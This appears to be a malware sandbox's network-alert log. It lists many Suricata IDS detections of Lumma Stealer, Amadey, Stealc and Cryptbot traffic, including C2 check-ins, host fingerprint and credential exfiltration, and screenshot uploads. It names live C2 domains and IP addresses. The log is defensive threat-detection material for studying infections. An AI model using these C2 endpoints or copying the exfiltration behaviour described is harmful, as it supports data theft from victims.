Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50020 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50019 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50048 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50083 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50072 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50089 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50096 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50094 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50117 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50133 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50132 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50140 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50138 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:53506 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50144 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:65374 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.6:54398 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50145 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50148 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50098 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50146 -> 176.53.146.212:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50151 -> 176.53.146.212:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50162 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50161 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50178 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50180 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50176 -> 176.53.146.212:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50181 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50191 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50189
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50183 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50193 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50195 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50205 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50192 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50186 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:54382 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50211 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50215 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50196 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50213 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50255 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50260 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50142 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50262 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50268 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50269 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:57132 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50263 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50272 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50274 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50307 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50313 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50312 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50317 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50321 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50349 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50318 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50350 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50379 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50381 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50372 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50391 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50383 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.6:50387 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50371 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50386 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50375 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50393 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50395 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50325 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50400 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:51044 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50328 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50413 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50214 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50419 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.6:50422 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50418 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:49157 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50416 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50427 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50431 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50439 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50441 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50448 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50453 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50459 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.6:50466 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50486 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49878 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49878 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49908 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49908 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49946 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49946 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50020 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50020 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50047 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50047 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50078 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50078 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50086 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50090 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50086 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50090 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50097 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50094 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50140 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50140 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50142 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50161 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50178 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50161 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50178 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50148 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50148 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50160 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50181 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50160 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50181 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50184 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50144 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50188 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50191 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50188 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50144 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50191 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50214 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50214 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50207 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50192 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50180 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50213 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50213 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50205 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50197 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50251 -> 104.21.12.88:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50268 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50262 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50262 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50267 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50269 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50325 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50274 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50324 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50274 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50313 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50349 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50387 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50393 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50396 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50395 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50418 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50466 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50418 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50309 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50453 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50318 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50422 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50318 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50459 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50438 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50438 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50383 -> 172.67.179.109:443
